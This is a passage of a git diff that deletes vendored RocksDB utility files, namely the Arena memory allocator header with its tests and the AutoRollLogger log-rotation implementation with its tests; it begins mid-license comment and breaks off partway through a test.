-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Arena is an implementation of Allocator class. For a request of small size,
-// it allocates a block with pre-defined block size. For a request of big
-// size, it uses malloc to directly get the requested size.
-
-#pragma once
-#ifndef OS_WIN
-#include <sys/mman.h>
-#endif
-#include <cstddef>
-#include <cerrno>
-#include <vector>
-#include <assert.h>
-#include <stdint.h>
-#include "util/allocator.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-class Arena : public Allocator {
- public:
-  // No copying allowed
-  Arena(const Arena&) = delete;
-  void operator=(const Arena&) = delete;
-
-  static const size_t kInlineSize = 2048;
-  static const size_t kMinBlockSize;
-  static const size_t kMaxBlockSize;
-
-  // huge_page_size: if 0, don't use huge page TLB. If > 0 (should set to the
-  // supported hugepage size of the system), block allocation will try huge
-  // page TLB first. If allocation fails, will fall back to normal case.
-  explicit Arena(size_t block_size = kMinBlockSize,
-                 AllocTracker* tracker = nullptr, size_t huge_page_size = 0);
-  ~Arena();
-
-  char* Allocate(size_t bytes) override;
-
-  // huge_page_size: if >0, will try to allocate from huage page TLB.
-  // The argument will be the size of the page size for huge page TLB. Bytes
-  // will be rounded up to multiple of the page size to allocate through mmap
-  // anonymous option with huge page on. The extra  space allocated will be
-  // wasted. If allocation fails, will fall back to normal case. To enable it,
-  // need to reserve huge pages for it to be allocated, like:
-  //     sysctl -w vm.nr_hugepages=20
-  // See linux doc Documentation/vm/hugetlbpage.txt for details.
-  // huge page allocation can fail. In this case it will fail back to
-  // normal cases. The messages will be logged to logger. So when calling with
-  // huge_page_tlb_size > 0, we highly recommend a logger is passed in.
-  // Otherwise, the error message will be printed out to stderr directly.
-  char* AllocateAligned(size_t bytes, size_t huge_page_size = 0,
-                        Logger* logger = nullptr) override;
-
-  // Returns an estimate of the total memory usage of data allocated
-  // by the arena (exclude the space allocated but not yet used for future
-  // allocations).
-  size_t ApproximateMemoryUsage() const {
-    return blocks_memory_ + blocks_.capacity() * sizeof(char*) -
-           alloc_bytes_remaining_;
-  }
-
-  size_t MemoryAllocatedBytes() const { return blocks_memory_; }
-
-  size_t AllocatedAndUnused() const { return alloc_bytes_remaining_; }
-
-  // If an allocation is too big, we'll allocate an irregular block with the
-  // same size of that allocation.
-  size_t IrregularBlockNum() const { return irregular_block_num; }
-
-  size_t BlockSize() const override { return kBlockSize; }
-
-  bool IsInInlineBlock() const {
-    return blocks_.empty();
-  }
-
- private:
-  char inline_block_[kInlineSize] __attribute__((__aligned__(sizeof(void*))));
-  // Number of bytes allocated in one block
-  const size_t kBlockSize;
-  // Array of new[] allocated memory blocks
-  typedef std::vector<char*> Blocks;
-  Blocks blocks_;
-
-  struct MmapInfo {
-    void* addr_;
-    size_t length_;
-
-    MmapInfo(void* addr, size_t length) : addr_(addr), length_(length) {}
-  };
-  std::vector<MmapInfo> huge_blocks_;
-  size_t irregular_block_num = 0;
-
-  // Stats for current active block.
-  // For each block, we allocate aligned memory chucks from one end and
-  // allocate unaligned memory chucks from the other end. Otherwise the
-  // memory waste for alignment will be higher if we allocate both types of
-  // memory from one direction.
-  char* unaligned_alloc_ptr_ = nullptr;
-  char* aligned_alloc_ptr_ = nullptr;
-  // How many bytes left in currently active block?
-  size_t alloc_bytes_remaining_ = 0;
-
-#ifdef MAP_HUGETLB
-  size_t hugetlb_size_ = 0;
-#endif  // MAP_HUGETLB
-  char* AllocateFromHugePage(size_t bytes);
-  char* AllocateFallback(size_t bytes, bool aligned);
-  char* AllocateNewBlock(size_t block_bytes);
-
-  // Bytes of memory in blocks allocated so far
-  size_t blocks_memory_ = 0;
-  AllocTracker* tracker_;
-};
-
-inline char* Arena::Allocate(size_t bytes) {
-  // The semantics of what to return are a bit messy if we allow
-  // 0-byte allocations, so we disallow them here (we don't need
-  // them for our internal use).
-  assert(bytes > 0);
-  if (bytes <= alloc_bytes_remaining_) {
-    unaligned_alloc_ptr_ -= bytes;
-    alloc_bytes_remaining_ -= bytes;
-    return unaligned_alloc_ptr_;
-  }
-  return AllocateFallback(bytes, false /* unaligned */);
-}
-
-// check and adjust the block_size so that the return value is
-//  1. in the range of [kMinBlockSize, kMaxBlockSize].
-//  2. the multiple of align unit.
-extern size_t OptimizeBlockSize(size_t block_size);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/arena_test.cc b/thirdparty/rocksdb/util/arena_test.cc
deleted file mode 100644
index 53777a2..0000000
--- a/thirdparty/rocksdb/util/arena_test.cc
+++ /dev/null
@@ -1,203 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/arena.h"
-#include "util/random.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-namespace {
-const size_t kHugePageSize = 2 * 1024 * 1024;
-}  // namespace
-class ArenaTest : public testing::Test {};
-
-TEST_F(ArenaTest, Empty) { Arena arena0; }
-
-namespace {
-bool CheckMemoryAllocated(size_t allocated, size_t expected) {
-  // The value returned by Arena::MemoryAllocatedBytes() may be greater than
-  // the requested memory. We choose a somewhat arbitrary upper bound of
-  // max_expected = expected * 1.1 to detect critical overallocation.
-  size_t max_expected = expected + expected / 10;
-  return allocated >= expected && allocated <= max_expected;
-}
-
-void MemoryAllocatedBytesTest(size_t huge_page_size) {
-  const int N = 17;
-  size_t req_sz;  // requested size
-  size_t bsz = 32 * 1024;  // block size
-  size_t expected_memory_allocated;
-
-  Arena arena(bsz, nullptr, huge_page_size);
-
-  // requested size > quarter of a block:
-  //   allocate requested size separately
-  req_sz = 12 * 1024;
-  for (int i = 0; i < N; i++) {
-    arena.Allocate(req_sz);
-  }
-  expected_memory_allocated = req_sz * N + Arena::kInlineSize;
-  ASSERT_PRED2(CheckMemoryAllocated, arena.MemoryAllocatedBytes(),
-               expected_memory_allocated);
-
-  arena.Allocate(Arena::kInlineSize - 1);
-
-  // requested size < quarter of a block:
-  //   allocate a block with the default size, then try to use unused part
-  //   of the block. So one new block will be allocated for the first
-  //   Allocate(99) call. All the remaining calls won't lead to new allocation.
-  req_sz = 99;
-  for (int i = 0; i < N; i++) {
-    arena.Allocate(req_sz);
-  }
-  if (huge_page_size) {
-    ASSERT_TRUE(
-        CheckMemoryAllocated(arena.MemoryAllocatedBytes(),
-                             expected_memory_allocated + bsz) ||
-        CheckMemoryAllocated(arena.MemoryAllocatedBytes(),
-                             expected_memory_allocated + huge_page_size));
-  } else {
-    expected_memory_allocated += bsz;
-    ASSERT_PRED2(CheckMemoryAllocated, arena.MemoryAllocatedBytes(),
-                 expected_memory_allocated);
-  }
-
-  // requested size > size of a block:
-  //   allocate requested size separately
-  expected_memory_allocated = arena.MemoryAllocatedBytes();
-  req_sz = 8 * 1024 * 1024;
-  for (int i = 0; i < N; i++) {
-    arena.Allocate(req_sz);
-  }
-  expected_memory_allocated += req_sz * N;
-  ASSERT_PRED2(CheckMemoryAllocated, arena.MemoryAllocatedBytes(),
-               expected_memory_allocated);
-}
-
-// Make sure we didn't count the allocate but not used memory space in
-// Arena::ApproximateMemoryUsage()
-static void ApproximateMemoryUsageTest(size_t huge_page_size) {
-  const size_t kBlockSize = 4096;
-  const size_t kEntrySize = kBlockSize / 8;
-  const size_t kZero = 0;
-  Arena arena(kBlockSize, nullptr, huge_page_size);
-  ASSERT_EQ(kZero, arena.ApproximateMemoryUsage());
-
-  // allocate inline bytes
-  EXPECT_TRUE(arena.IsInInlineBlock());
-  arena.AllocateAligned(8);
-  EXPECT_TRUE(arena.IsInInlineBlock());
-  arena.AllocateAligned(Arena::kInlineSize / 2 - 16);
-  EXPECT_TRUE(arena.IsInInlineBlock());
-  arena.AllocateAligned(Arena::kInlineSize / 2);
-  EXPECT_TRUE(arena.IsInInlineBlock());
-  ASSERT_EQ(arena.ApproximateMemoryUsage(), Arena::kInlineSize - 8);
-  ASSERT_PRED2(CheckMemoryAllocated, arena.MemoryAllocatedBytes(),
-               Arena::kInlineSize);
-
-  auto num_blocks = kBlockSize / kEntrySize;
-
-  // first allocation
-  arena.AllocateAligned(kEntrySize);
-  EXPECT_FALSE(arena.IsInInlineBlock());
-  auto mem_usage = arena.MemoryAllocatedBytes();
-  if (huge_page_size) {
-    ASSERT_TRUE(
-        CheckMemoryAllocated(mem_usage, kBlockSize + Arena::kInlineSize) ||
-        CheckMemoryAllocated(mem_usage, huge_page_size + Arena::kInlineSize));
-  } else {
-    ASSERT_PRED2(CheckMemoryAllocated, mem_usage,
-                 kBlockSize + Arena::kInlineSize);
-  }
-  auto usage = arena.ApproximateMemoryUsage();
-  ASSERT_LT(usage, mem_usage);
-  for (size_t i = 1; i < num_blocks; ++i) {
-    arena.AllocateAligned(kEntrySize);
-    ASSERT_EQ(mem_usage, arena.MemoryAllocatedBytes());
-    ASSERT_EQ(arena.ApproximateMemoryUsage(), usage + kEntrySize);
-    EXPECT_FALSE(arena.IsInInlineBlock());
-    usage = arena.ApproximateMemoryUsage();
-  }
-  if (huge_page_size) {
-    ASSERT_TRUE(usage > mem_usage ||
-                usage + huge_page_size - kBlockSize == mem_usage);
-  } else {
-    ASSERT_GT(usage, mem_usage);
-  }
-}
-
-static void SimpleTest(size_t huge_page_size) {
-  std::vector<std::pair<size_t, char*>> allocated;
-  Arena arena(Arena::kMinBlockSize, nullptr, huge_page_size);
-  const int N = 100000;
-  size_t bytes = 0;
-  Random rnd(301);
-  for (int i = 0; i < N; i++) {
-    size_t s;
-    if (i % (N / 10) == 0) {
-      s = i;
-    } else {
-      s = rnd.OneIn(4000)
-              ? rnd.Uniform(6000)
-              : (rnd.OneIn(10) ? rnd.Uniform(100) : rnd.Uniform(20));
-    }
-    if (s == 0) {
-      // Our arena disallows size 0 allocations.
-      s = 1;
-    }
-    char* r;
-    if (rnd.OneIn(10)) {
-      r = arena.AllocateAligned(s);
-    } else {
-      r = arena.Allocate(s);
-    }
-
-    for (unsigned int b = 0; b < s; b++) {
-      // Fill the "i"th allocation with a known bit pattern
-      r[b] = i % 256;
-    }
-    bytes += s;
-    allocated.push_back(std::make_pair(s, r));
-    ASSERT_GE(arena.ApproximateMemoryUsage(), bytes);
-    if (i > N / 10) {
-      ASSERT_LE(arena.ApproximateMemoryUsage(), bytes * 1.10);
-    }
-  }
-  for (unsigned int i = 0; i < allocated.size(); i++) {
-    size_t num_bytes = allocated[i].first;
-    const char* p = allocated[i].second;
-    for (unsigned int b = 0; b < num_bytes; b++) {
-      // Check the "i"th allocation for the known bit pattern
-      ASSERT_EQ(int(p[b]) & 0xff, (int)(i % 256));
-    }
-  }
-}
-}  // namespace
-
-TEST_F(ArenaTest, MemoryAllocatedBytes) {
-  MemoryAllocatedBytesTest(0);
-  MemoryAllocatedBytesTest(kHugePageSize);
-}
-
-TEST_F(ArenaTest, ApproximateMemoryUsage) {
-  ApproximateMemoryUsageTest(0);
-  ApproximateMemoryUsageTest(kHugePageSize);
-}
-
-TEST_F(ArenaTest, Simple) {
-  SimpleTest(0);
-  SimpleTest(kHugePageSize);
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/auto_roll_logger.cc b/thirdparty/rocksdb/util/auto_roll_logger.cc
deleted file mode 100644
index ae6061a..0000000
--- a/thirdparty/rocksdb/util/auto_roll_logger.cc
+++ /dev/null
@@ -1,177 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "util/auto_roll_logger.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-// -- AutoRollLogger
-Status AutoRollLogger::ResetLogger() {
-  TEST_SYNC_POINT("AutoRollLogger::ResetLogger:BeforeNewLogger");
-  status_ = env_->NewLogger(log_fname_, &logger_);
-  TEST_SYNC_POINT("AutoRollLogger::ResetLogger:AfterNewLogger");
-
-  if (!status_.ok()) {
-    return status_;
-  }
-
-  if (logger_->GetLogFileSize() == Logger::kDoNotSupportGetLogFileSize) {
-    status_ = Status::NotSupported(
-        "The underlying logger doesn't support GetLogFileSize()");
-  }
-  if (status_.ok()) {
-    cached_now = static_cast<uint64_t>(env_->NowMicros() * 1e-6);
-    ctime_ = cached_now;
-    cached_now_access_count = 0;
-  }
-
-  return status_;
-}
-
-void AutoRollLogger::RollLogFile() {
-  // This function is called when log is rotating. Two rotations
-  // can happen quickly (NowMicro returns same value). To not overwrite
-  // previous log file we increment by one micro second and try again.
-  uint64_t now = env_->NowMicros();
-  std::string old_fname;
-  do {
-    old_fname = OldInfoLogFileName(
-      dbname_, now, db_absolute_path_, db_log_dir_);
-    now++;
-  } while (env_->FileExists(old_fname).ok());
-  env_->RenameFile(log_fname_, old_fname);
-}
-
-std::string AutoRollLogger::ValistToString(const char* format,
-                                           va_list args) const {
-  // Any log messages longer than 1024 will get truncated.
-  // The user is responsible for chopping longer messages into multi line log
-  static const int MAXBUFFERSIZE = 1024;
-  char buffer[MAXBUFFERSIZE];
-
-  int count = vsnprintf(buffer, MAXBUFFERSIZE, format, args);
-  (void) count;
-  assert(count >= 0);
-
-  return buffer;
-}
-
-void AutoRollLogger::LogInternal(const char* format, ...) {
-  mutex_.AssertHeld();
-  va_list args;
-  va_start(args, format);
-  logger_->Logv(format, args);
-  va_end(args);
-}
-
-void AutoRollLogger::Logv(const char* format, va_list ap) {
-  assert(GetStatus().ok());
-
-  std::shared_ptr<Logger> logger;
-  {
-    MutexLock l(&mutex_);
-    if ((kLogFileTimeToRoll > 0 && LogExpired()) ||
-        (kMaxLogFileSize > 0 && logger_->GetLogFileSize() >= kMaxLogFileSize)) {
-      RollLogFile();
-      Status s = ResetLogger();
-      if (!s.ok()) {
-        // can't really log the error if creating a new LOG file failed
-        return;
-      }
-
-      WriteHeaderInfo();
-    }
-
-    // pin down the current logger_ instance before releasing the mutex.
-    logger = logger_;
-  }
-
-  // Another thread could have put a new Logger instance into logger_ by now.
-  // However, since logger is still hanging on to the previous instance
-  // (reference count is not zero), we don't have to worry about it being
-  // deleted while we are accessing it.
-  // Note that logv itself is not mutex protected to allow maximum concurrency,
-  // as thread safety should have been handled by the underlying logger.
-  logger->Logv(format, ap);
-}
-
-void AutoRollLogger::WriteHeaderInfo() {
-  mutex_.AssertHeld();
-  for (auto& header : headers_) {
-    LogInternal("%s", header.c_str());
-  }
-}
-
-void AutoRollLogger::LogHeader(const char* format, va_list args) {
-  // header message are to be retained in memory. Since we cannot make any
-  // assumptions about the data contained in va_list, we will retain them as
-  // strings
-  va_list tmp;
-  va_copy(tmp, args);
-  std::string data = ValistToString(format, tmp);
-  va_end(tmp);
-
-  MutexLock l(&mutex_);
-  headers_.push_back(data);
-
-  // Log the original message to the current log
-  logger_->Logv(format, args);
-}
-
-bool AutoRollLogger::LogExpired() {
-  if (cached_now_access_count >= call_NowMicros_every_N_records_) {
-    cached_now = static_cast<uint64_t>(env_->NowMicros() * 1e-6);
-    cached_now_access_count = 0;
-  }
-
-  ++cached_now_access_count;
-  return cached_now >= ctime_ + kLogFileTimeToRoll;
-}
-#endif  // !ROCKSDB_LITE
-
-Status CreateLoggerFromOptions(const std::string& dbname,
-                               const DBOptions& options,
-                               std::shared_ptr<Logger>* logger) {
-  if (options.info_log) {
-    *logger = options.info_log;
-    return Status::OK();
-  }
-
-  Env* env = options.env;
-  std::string db_absolute_path;
-  env->GetAbsolutePath(dbname, &db_absolute_path);
-  std::string fname =
-      InfoLogFileName(dbname, db_absolute_path, options.db_log_dir);
-
-  env->CreateDirIfMissing(dbname);  // In case it does not exist
-  // Currently we only support roll by time-to-roll and log size
-#ifndef ROCKSDB_LITE
-  if (options.log_file_time_to_roll > 0 || options.max_log_file_size > 0) {
-    AutoRollLogger* result = new AutoRollLogger(
-        env, dbname, options.db_log_dir, options.max_log_file_size,
-        options.log_file_time_to_roll, options.info_log_level);
-    Status s = result->GetStatus();
-    if (!s.ok()) {
-      delete result;
-    } else {
-      logger->reset(result);
-    }
-    return s;
-  }
-#endif  // !ROCKSDB_LITE
-  // Open a log file in the same directory as the db
-  env->RenameFile(fname,
-                  OldInfoLogFileName(dbname, env->NowMicros(), db_absolute_path,
-                                     options.db_log_dir));
-  auto s = env->NewLogger(fname, logger);
-  if (logger->get() != nullptr) {
-    (*logger)->SetInfoLogLevel(options.info_log_level);
-  }
-  return s;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/auto_roll_logger.h b/thirdparty/rocksdb/util/auto_roll_logger.h
deleted file mode 100644
index 2f1f943..0000000
--- a/thirdparty/rocksdb/util/auto_roll_logger.h
+++ /dev/null
@@ -1,133 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Logger implementation that can be shared by all environments
-// where enough posix functionality is available.
-
-#pragma once
-#include <list>
-#include <string>
-
-#include "port/port.h"
-#include "port/util_logger.h"
-#include "util/filename.h"
-#include "util/mutexlock.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-// Rolls the log file by size and/or time
-class AutoRollLogger : public Logger {
- public:
-  AutoRollLogger(Env* env, const std::string& dbname,
-                 const std::string& db_log_dir, size_t log_max_size,
-                 size_t log_file_time_to_roll,
-                 const InfoLogLevel log_level = InfoLogLevel::INFO_LEVEL)
-      : Logger(log_level),
-        dbname_(dbname),
-        db_log_dir_(db_log_dir),
-        env_(env),
-        status_(Status::OK()),
-        kMaxLogFileSize(log_max_size),
-        kLogFileTimeToRoll(log_file_time_to_roll),
-        cached_now(static_cast<uint64_t>(env_->NowMicros() * 1e-6)),
-        ctime_(cached_now),
-        cached_now_access_count(0),
-        call_NowMicros_every_N_records_(100),
-        mutex_() {
-    env->GetAbsolutePath(dbname, &db_absolute_path_);
-    log_fname_ = InfoLogFileName(dbname_, db_absolute_path_, db_log_dir_);
-    RollLogFile();
-    ResetLogger();
-  }
-
-  using Logger::Logv;
-  void Logv(const char* format, va_list ap) override;
-
-  // Write a header entry to the log. All header information will be written
-  // again every time the log rolls over.
-  virtual void LogHeader(const char* format, va_list ap) override;
-
-  // check if the logger has encountered any problem.
-  Status GetStatus() {
-    return status_;
-  }
-
-  size_t GetLogFileSize() const override {
-    std::shared_ptr<Logger> logger;
-    {
-      MutexLock l(&mutex_);
-      // pin down the current logger_ instance before releasing the mutex.
-      logger = logger_;
-    }
-    return logger->GetLogFileSize();
-  }
-
-  void Flush() override {
-    std::shared_ptr<Logger> logger;
-    {
-      MutexLock l(&mutex_);
-      // pin down the current logger_ instance before releasing the mutex.
-      logger = logger_;
-    }
-    TEST_SYNC_POINT("AutoRollLogger::Flush:PinnedLogger");
-    if (logger) {
-      logger->Flush();
-    }
-  }
-
-  virtual ~AutoRollLogger() {
-  }
-
-  void SetCallNowMicrosEveryNRecords(uint64_t call_NowMicros_every_N_records) {
-    call_NowMicros_every_N_records_ = call_NowMicros_every_N_records;
-  }
-
-  // Expose the log file path for testing purpose
-  std::string TEST_log_fname() const {
-    return log_fname_;
-  }
-
-  uint64_t TEST_ctime() const { return ctime_; }
-
- private:
-  bool LogExpired();
-  Status ResetLogger();
-  void RollLogFile();
-  // Log message to logger without rolling
-  void LogInternal(const char* format, ...);
-  // Serialize the va_list to a string
-  std::string ValistToString(const char* format, va_list args) const;
-  // Write the logs marked as headers to the new log file
-  void WriteHeaderInfo();
-
-  std::string log_fname_; // Current active info log's file name.
-  std::string dbname_;
-  std::string db_log_dir_;
-  std::string db_absolute_path_;
-  Env* env_;
-  std::shared_ptr<Logger> logger_;
-  // current status of the logger
-  Status status_;
-  const size_t kMaxLogFileSize;
-  const size_t kLogFileTimeToRoll;
-  // header information
-  std::list<std::string> headers_;
-  // to avoid frequent env->NowMicros() calls, we cached the current time
-  uint64_t cached_now;
-  uint64_t ctime_;
-  uint64_t cached_now_access_count;
-  uint64_t call_NowMicros_every_N_records_;
-  mutable port::Mutex mutex_;
-};
-#endif  // !ROCKSDB_LITE
-
-// Facade to craete logger automatically
-Status CreateLoggerFromOptions(const std::string& dbname,
-                               const DBOptions& options,
-                               std::shared_ptr<Logger>* logger);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/auto_roll_logger_test.cc b/thirdparty/rocksdb/util/auto_roll_logger_test.cc
deleted file mode 100644
index 9b39748..0000000
--- a/thirdparty/rocksdb/util/auto_roll_logger_test.cc
+++ /dev/null
@@ -1,490 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-
-#include "util/auto_roll_logger.h"
-#include <errno.h>
-#include <sys/stat.h>
-#include <algorithm>
-#include <cmath>
-#include <fstream>
-#include <iostream>
-#include <iterator>
-#include <string>
-#include <thread>
-#include <vector>
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "util/logging.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-namespace {
-class NoSleepEnv : public EnvWrapper {
- public:
-  NoSleepEnv(Env* base) : EnvWrapper(base) {}
-  virtual void SleepForMicroseconds(int micros) override {
-    fake_time_ += static_cast<uint64_t>(micros);
-  }
-
-  virtual uint64_t NowNanos() override { return fake_time_ * 1000; }
-
-  virtual uint64_t NowMicros() override { return fake_time_; }
-
- private:
-  uint64_t fake_time_ = 6666666666;
-};
-}  // namespace
-
-class AutoRollLoggerTest : public testing::Test {
- public:
-  static void InitTestDb() {
-#ifdef OS_WIN
-    // Replace all slashes in the path so windows CompSpec does not
-    // become confused
-    std::string testDir(kTestDir);
-    std::replace_if(testDir.begin(), testDir.end(),
-                    [](char ch) { return ch == '/'; }, '\\');
-    std::string deleteCmd = "if exist " + testDir + " rd /s /q " + testDir;
-#else
-    std::string deleteCmd = "rm -rf " + kTestDir;
-#endif
-    ASSERT_TRUE(system(deleteCmd.c_str()) == 0);
-    Env::Default()->CreateDir(kTestDir);
-  }
-
-  void RollLogFileBySizeTest(AutoRollLogger* logger, size_t log_max_size,
-                             const std::string& log_message);
-  void RollLogFileByTimeTest(Env*, AutoRollLogger* logger, size_t time,
-                             const std::string& log_message);
-
-  static const std::string kSampleMessage;
-  static const std::string kTestDir;
-  static const std::string kLogFile;
-  static Env* default_env;
-};
-
-const std::string AutoRollLoggerTest::kSampleMessage(
-    "this is the message to be written to the log file!!");
-const std::string AutoRollLoggerTest::kTestDir(test::TmpDir() + "/db_log_test");
-const std::string AutoRollLoggerTest::kLogFile(test::TmpDir() +
-                                               "/db_log_test/LOG");
-Env* AutoRollLoggerTest::default_env = Env::Default();
-
-// In this test we only want to Log some simple log message with
-// no format. LogMessage() provides such a simple interface and
-// avoids the [format-security] warning which occurs when you
-// call ROCKS_LOG_INFO(logger, log_message) directly.
-namespace {
-void LogMessage(Logger* logger, const char* message) {
-  ROCKS_LOG_INFO(logger, "%s", message);
-}
-
-void LogMessage(const InfoLogLevel log_level, Logger* logger,
-                const char* message) {
-  Log(log_level, logger, "%s", message);
-}
-}  // namespace
-
-void AutoRollLoggerTest::RollLogFileBySizeTest(AutoRollLogger* logger,
-                                               size_t log_max_size,
-                                               const std::string& log_message) {
-  logger->SetInfoLogLevel(InfoLogLevel::INFO_LEVEL);
-  // measure the size of each message, which is supposed
-  // to be equal or greater than log_message.size()
-  LogMessage(logger, log_message.c_str());
-  size_t message_size = logger->GetLogFileSize();
-  size_t current_log_size = message_size;
-
-  // Test the cases when the log file will not be rolled.
-  while (current_log_size + message_size < log_max_size) {
-    LogMessage(logger, log_message.c_str());
-    current_log_size += message_size;
-    ASSERT_EQ(current_log_size, logger->GetLogFileSize());
-  }
-
-  // Now the log file will be rolled
-  LogMessage(logger, log_message.c_str());
-  // Since rotation is checked before actual logging, we need to
-  // trigger the rotation by logging another message.
-  LogMessage(logger, log_message.c_str());
-
-  ASSERT_TRUE(message_size == logger->GetLogFileSize());
-}
-
-void AutoRollLoggerTest::RollLogFileByTimeTest(Env* env, AutoRollLogger* logger,
-                                               size_t time,
-                                               const std::string& log_message) {
-  uint64_t expected_ctime;
-  uint64_t actual_ctime;
-
-  uint64_t total_log_size;
-  EXPECT_OK(env->GetFileSize(kLogFile, &total_log_size));
-  expected_ctime = logger->TEST_ctime();
-  logger->SetCallNowMicrosEveryNRecords(0);
-
-  // -- Write to the log for several times, which is supposed
-  // to be finished before time.
-  for (int i = 0; i < 10; ++i) {
-    env->SleepForMicroseconds(50000);
-    LogMessage(logger, log_message.c_str());
-    EXPECT_OK(logger->GetStatus());
-    // Make sure we always write to the same log file (by
-    // checking the create time);
-
-    actual_ctime = logger->TEST_ctime();
-
-    // Also make sure the log size is increasing.
-    EXPECT_EQ(expected_ctime, actual_ctime);
-    EXPECT_GT(logger->GetLogFileSize(), total_log_size);
-    total_log_size = logger->GetLogFileSize();
-  }
-
-  // -- Make the log file expire
-  env->SleepForMicroseconds(static_cast<int>(time * 1000000));
-  LogMessage(logger, log_message.c_str());
-
-  // At this time, the new log file should be created.
-  actual_ctime = logger->TEST_ctime();
-  EXPECT_LT(expected_ctime, actual_ctime);
-  EXPECT_LT(logger->GetLogFileSize(), total_log_size);
-}
-
-TEST_F(AutoRollLoggerTest, RollLogFileBySize) {
-    InitTestDb();
-    size_t log_max_size = 1024 * 5;
-
-    AutoRollLogger logger(Env::Default(), kTestDir, "", log_max_size, 0);
-
-    RollLogFileBySizeTest(&logger, log_max_size,
-                          kSampleMessage + ":RollLogFileBySize");
-}
-
-TEST_F(AutoRollLoggerTest, RollLogFileByTime) {
-  NoSleepEnv nse(Env::Default());
-
-  size_t time = 2;
-  size_t log_size = 1024 * 5;
-
-  InitTestDb();
-  // -- Test the existence of file during the server restart.
-  ASSERT_EQ(Status::NotFound(), default_env->FileExists(kLogFile));
-  AutoRollLogger logger(&nse, kTestDir, "", log_size, time);
-  ASSERT_OK(default_env->FileExists(kLogFile));
-
-  RollLogFileByTimeTest(&nse, &logger, time,
-                        kSampleMessage + ":RollLogFileByTime");
-}
-
-TEST_F(AutoRollLoggerTest, OpenLogFilesMultipleTimesWithOptionLog_max_size) {
-  // If only 'log_max_size' options is specified, then every time
-  // when rocksdb is restarted, a new empty log file will be created.
-  InitTestDb();
-  // WORKAROUND:
-  // avoid complier's complaint of "comparison between signed
-  // and unsigned integer expressions" because literal 0 is
-  // treated as "singed".
-  size_t kZero = 0;
-  size_t log_size = 1024;
-
-  AutoRollLogger* logger = new AutoRollLogger(
-    Env::Default(), kTestDir, "", log_size, 0);
-
-  LogMessage(logger, kSampleMessage.c_str());
-  ASSERT_GT(logger->GetLogFileSize(), kZero);
-  delete logger;
-
-  // reopens the log file and an empty log file will be created.
-  logger = new AutoRollLogger(
-    Env::Default(), kTestDir, "", log_size, 0);
-  ASSERT_EQ(logger->GetLogFileSize(), kZero);
-  delete logger;
-}
-
-TEST_F(AutoRollLoggerTest, CompositeRollByTimeAndSizeLogger) {
-  size_t time = 2, log_max_size = 1024 * 5;
-
-  InitTestDb();
-
-  NoSleepEnv nse(Env::Default());
-  AutoRollLogger logger(&nse, kTestDir, "", log_max_size, time);
-
-  // Test the ability to roll by size
-  RollLogFileBySizeTest(&logger, log_max_size,
-                        kSampleMessage + ":CompositeRollByTimeAndSizeLogger");
-
-  // Test the ability to roll by Time
-  RollLogFileByTimeTest(&nse, &logger, time,
-                        kSampleMessage + ":CompositeRollByTimeAndSizeLogger");
-}
-
-#ifndef OS_WIN
-// TODO: does not build for Windows because of PosixLogger use below. Need to
-// port
-TEST_F(AutoRollLoggerTest, CreateLoggerFromOptions) {
-  DBOptions options;
-  NoSleepEnv nse(Env::Default());
-  shared_ptr<Logger> logger;
-
-  // Normal logger
-  ASSERT_OK(CreateLoggerFromOptions(kTestDir, options, &logger));
-  ASSERT_TRUE(dynamic_cast<PosixLogger*>(logger.get()));
-
-  // Only roll by size
-  InitTestDb();
-  options.max_log_file_size = 1024;
-  ASSERT_OK(CreateLoggerFromOptions(kTestDir, options, &logger));
-  AutoRollLogger* auto_roll_logger =
-    dynamic_cast<AutoRollLogger*>(logger.get());
-  ASSERT_TRUE(auto_roll_logger);
-  RollLogFileBySizeTest(
-      auto_roll_logger, options.max_log_file_size,
-      kSampleMessage + ":CreateLoggerFromOptions - size");
-
-  // Only roll by Time
-  options.env = &nse;
-  InitTestDb();
-  options.max_log_file_size = 0;
-  options.log_file_time_to_roll = 2;
-  ASSERT_OK(CreateLoggerFromOptions(kTestDir, options, &logger));
-  auto_roll_logger =
-    dynamic_cast<AutoRollLogger*>(logger.get());
-  RollLogFileByTimeTest(&nse, auto_roll_logger, options.log_file_time_to_roll,
-                        kSampleMessage + ":CreateLoggerFromOptions - time");
-
-  // roll by both Time and size
-  InitTestDb();
-  options.max_log_file_size = 1024 * 5;
-  options.log_file_time_to_roll = 2;
-  ASSERT_OK(CreateLoggerFromOptions(kTestDir, options, &logger));
-  auto_roll_logger =
